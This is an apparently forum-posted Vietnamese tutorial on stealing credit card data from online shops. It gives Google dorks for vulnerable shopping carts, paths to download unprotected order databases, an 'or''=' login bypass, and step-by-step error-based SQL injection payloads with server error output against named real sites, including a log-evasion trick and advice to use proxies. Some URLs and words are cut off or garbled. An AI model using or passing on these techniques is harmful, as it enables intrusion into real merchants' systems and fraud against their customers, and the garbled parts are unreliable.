CODE

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

'T005_CC_PACKAGES' to a column of data type int

C:\INETPUB\WWWROOT\xxx\INCLUDE\ /lib/dblib.asp, line 95

'T005_CC_PACKAGES' chính là 1 bảng trong data Nếu muốn lấy tên bảng tiếp theo ta chỉ việc

http://www.xxx.com/item.asp?item_id=1%2bco n_schema.tables where table_name not in

('T005_CC_PACKAGES'

))) tiếp tục cho đến khi nào hiện thông báo : Invalid item thì là hết table đó

Muốn lấy tên cột trong bảng thì làm như sau :

http://www.xxx.com/item.asp?item_id=1%2bco n_schema.colums where table_name='tên

bảng')) lấy tiếp thì lại dùng not in:

http://www.xxx.com/item.asp?item_id=1%2bco n_schema.colums where table_name="tên bảng" not in ('Tên cột đãbiết','tên cột đã biết')))

Lấy giá trị trong cột :

http://www.xxx.com/item.asp?item_id=1%2bco 201%20'tên cột'%20from 'tên bảng chứa

cột')) Mục đích của nhiều bạn là lấy hết toàn bộ thông tin về table , colum của data từ đó

để khai thác tài khoản đăng nhập admin của site đó Nhưng những cách từng bước trên rất mệt khi đường Link dài quá

IE lỗi luôn đó phải dùng trình duyệt khác(Mozila hay Netscape )

+ Có cách khác nhanh hơn :

Đăng nhập bằng user: 'or''=' pass: 'or''='

vd nếu bạn may mắn thì sẽ tìm được chỗ login vào phần quản lý web

Tổng hợp cách hack cc căn bản nhất!

Thường các hacker hack cc từ những lỗi nghiêm trọng của các site bán hàng trên toàn thế giới (còn vô số những sitechưa fix ) các lỗi thường gặp là :

acart2_0

SalesCart Database Storage Insecurity

Trong file shopper.cgi

-Lỗi VP-ASP:

đầu tiên vàohttp://google.com/ search từ khoá "shopdisplaycategories" click vào site bạn sẽ thấy làhttp://www

sitename.com/shopping/shopdisplaycategories.asp

Việc tiếp theo là chuyển urlhttp://www.sitename.com/shopping/shopdisplaycategories.asp thành urlhttp://www

sitename.com/shopping/shopdbtest.asp nghĩa là thay shopdisplaycategories.asp bằng shopdbtest.asp rồi enter nếu ratiếp thêm một trang nữa < -ko phảt là no page thì bạn có cơ hội down *mdb của site này đó

sau khi ra trang mới xong,áp dụng công thức http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + mdb ]

-[vp-asp site] là :http://www.sitename.com/

-[ vp-asp dir] là :shopping

Hack CC thông qua lỗi SalesCart Database Storage Insecurity:

Tổng quát: Lỗi này thực chất là dữ liệu của các chương trình mua bán không được bảo mật, mã hóa hay cất giữ cẩnthận nên bạn hoàn toàn có thể lấy chúng một cách dễ dàng

Lưu ý: đôi khi với thực tế, 1 số link có thể khác đi, không phải lúc nào cũng hoàn toàn đúng, dữ liệu có khi bao gồm cảCRD (Credit Card) nên mọi việc phải qua proxy (nếu không có proxy thì có thể ra dịch vụ )

Khai thác: Hãy sử dụng 1 trong những link sau:

Ví dụ: site84vn.com có thể download cc từ đây:www.84vn.com/database/metacart.mdb

Có nghĩa là database không hề có 1 chút bảo mật nào cả Download vô tư ! Trong database có thể bao gồm: name,surname, address, e-mail, phone number, credit card number, company name

Bạn có thể khai thác dữ liệu này, nhưng trong thực tế, mọi việc không phải lúc nào cũng suôn sẻ cả, bạn hãy tưởngtượng mỗi server có một cấu trúc riêng, ví dụ như đường dẫn không phải lúc nào cũng là fpdb/ hay như những linktrên, hãy tận dụng lỗi và thử từng cái một , nhiều khi làwww.victim.com/muaban/fpdb/shop.mdb vì vậy nếu bạn xàicách này hãy linh hoạt trong link tuỳ vào từng site! < copy by h4a

lên google tìm từ khóa

## This file contains the user specific variables

## necessary for Commerce.cgi

xóa cái commerce_user_lib.pl đi thay bằng onlinebookstore.log (tìm ở $sc_order_log_name ) và

Việc tiếp theo là thuộc về bạn

-Vào google gõ từ khoá tek9.aspta được link có dạng tương tự như thế này

https://ionicpurifier.com/tek9.asp?pg=orders&mode=search

bắy đầu từ /tek9.asp/ gõ thêm /intranethttps://ionicpurifier.com/intranet/tek9.asp ers&mode=search

Sau đó đăng nhập với user và pass 'or''='nếu may mắn thì sẽ vào được , và ăn cc tha hồ

còn rất nhiều site bị lỗi này

-Hack shop qua lỗi SQL server injection

gioi thieu so qua cho anh em biet ve hack sql server inject ha !

hack bang ky thuat convert noi nom na la convert 1 bieu thuc dang string sang dang int nhung ko the thuc hien duoc gay thong bao loi (co nhung shop ma ta khong nhan duoc thong bao cua no,vi

value=hidden),vi the truoc tien de hack duoc shop ODBC MySQL server2000 hay 7.0 thi it nhat anh

em cung phai xem qua source 1 chut ha,de roi con biet co nen hack theo cach nao`.

o day chi gioi thieu cach convert dung` de lay thong bao loi thoi,neu may bac' can hack ca server thi noi nhieu,noi dai dong lam

Detail:

search tren cac trang search engine tuy anh em thich thoi,hien co rat nhieu trang search engine ma anh

em thuong dung nhu

ok search for: allinurl: "/shop/viewproduct.asp" hoac may bac co the search = tu key word allinurl:

"/shop/index.asp" (nhung cai tu khoa nay van chua xac nhan duoc tinh dung dan cua no,vi no cho ra tat rat nhieu site,ma ko phai ODBC MySQL database,hic,ma thuong la` JSP(java server page) hoac JET, hoac VB.net net va de nay can phai co su no luc cua anh em trong viec test.

ok

co' duoc muc tieu roi chon dai 1 thang,vd:

http://www.mcmessentials.com.au/shop/viewp 20&categoryid=5

http://www.mcmessentials.com.au/shop/viewp 20&categoryid=5

okay co muc tieu roi bat dau test no ha

http://www.mcmessentials.com.au/shop/viewp tegoryid=5'

neu CSDL cua no duoc viet = ODBC MySQL server thi anh em se nhan duoc thong bao sau

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''

/shop/include/viewproduct.asp, line 3

okay,con neu ko thi ko thay gi het,hoac la` ban phai xem trong source de biet

ok bat dau tim table

co the test theo cac cach sau ma em da biet

(space)having 1=1 _sp_password (%20 la space la khoang trang day)

thuong thi test = cau truy van (space)having 1=1 sp_password la duoc duyet qua ok

*luu y' cac anh em 1 dieu rat can thiet

1 %2b co nghia la dau + nhung ma truyen truc tiep dau + vao se bi SQL filter mat bat buoc phai co sp_password demarks log tranh bi phat hien

http://www.mcmessentials.com.au/shop/viewp =1 sp_password

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'categories.label' is invalid in the select list because it isnot contained in an aggregate function and there is no GROUP BY clause

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'braunshop' to acolumn of data type int

/shop/include/viewproduct.asp, line 3

'braunshop' la truong user_name cua shop

*luu y

2 truong user_name() la de xac dinh user hien tai,neu no la dbo thi ta co kha nang hack thang vao ca server ma ko canquyen admin,con neu ko thi ta co nhung buoc trung gian de chiem,ok ta dung lai o viec lay cc tu shop ma thoi,ko noiden chuyen chiem ca server,much dich de anh em hoc hoi,va trao doi kinh nghiem la chinh,ko loi keo anh em pha hoainghiem trong den bat cu ai khac nen toi chi post va dung lai o phan lay cc ma thoi,con neu ai co thu oan gi voi thangnao,muon deface,lay pass,lay root,lay server,host thi lien he voi toi

ok bay gio ta se lan luot lay cac table tren column label

lay table thu 1 thong qua cau truy van sau

%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables)) sp_password

day du la`

http://www.mcmessentials.com.au/shop/viewp )) sp_password

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'categorieslist' to acolumn of data type int

/shop/include/viewproduct.asp, line 3

ok table 1 la 'categorieslist',muon lay table thu 2 thi phai dung den where table_name not in('table1')

cau truy van nhu sau:

%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%

20table_name%20not%

20in('categorieslist'))) sp_password

http://www.mcmessentials.com.au/shop/viewp )) sp_password

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'allorders' to a column

of data type int

/shop/include/viewproduct.asp, line 3

table 2 la` 'allorders'

muon lay table thu 3 va cac table co lai thi tiep tu lam tuong tu nhu lay table thu 2 vay

%2bconvert(int,(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%

20table_name%20not%

20in('categorieslist','allorders'))) sp_password

day la tat ca cac table cua shop vua lay duoc

'categorieslist','allorders','categories','categor ymembers','deliveryZones','dtproperties','essorder s','fullorder','keywords','optiongroupmembers','optiongroups','optiongroupsl ist','optionmembers','options','optionslist','orde

roptions','orderoptions-options','orderproducts','orderproducts-products','orders','products','products-categories','products-options','searchresults','sysconstraints','syssegm ents'

ok sau khi lay duoc tat ca cac table roi thi ban bat dau lay colum cua table,co 2 kieu lay column,1 la lay tat ca caccolumn,ko co muc dich gi hoac de kiem tra toan bo database,2 la` ta da xac dinh duoc can phai lay column trong tablenao,sau do moi lay,toi thi chi lay column trong table nao co cc thoi,'allorders' hoac 'orders'

ok ta lay no thoi

cau truy van lay column dau tien la`

1 -lay column tren tat ca cac table,ko can biet no thuoc table nao,lay den khi nao het thi thoi,cau truy van co dang

%2bconvert(int,(select top 1 column_name from information_schema.columns)) sp_password

duoc column1 roi thi dung where column_name not in('column1') ok ha

2 lay column tren table da xac dinh truoc

cau truy van nhu sau vi du toi lay column tren table orders

%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name

='orders')) sp_password

http://www.mcmessentials.com.au/shop/viewp )) sp_password

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'orderid' to a column

of data type int

/shop/include/viewproduct.asp, line 3

column dau tien la` 'orderid'

lay column thu 2 thi can them and column_name not in('orderid')

%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders' and

column_name not in('orderid'))) sp_password

http://www.mcmessentials.com.au/shop/viewp )) sp_password

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'created' to a column

of data type int

/shop/include/viewproduct.asp, line 3

va lan luot lay cho het cac column cua table 'orders'

khi anh em da lay duoc tat ca cac column cua table 'orders'roi thi chi con viec sau cung hap dan nhat ma thoi,do la laycc,anh em hay viet thanh 1 cau truy van de lay cc dua vao tat ca cac column cua anh em nhan duoc,moi shop no co cacfield database khac nhau,nhung hau het cac shop duoc search duoi dang allinurl: "/shop?viewproduct.asp" thi chi co 1kieu truy van duy nhat,vi em da thu qua tat ca roi hhihihi cai nao cung ok ca

may anh em khoi mat cong xap xep lai de viet thang cau truy van chi cho met,toi dua luon cho anh em xai choi

lay cc dau tien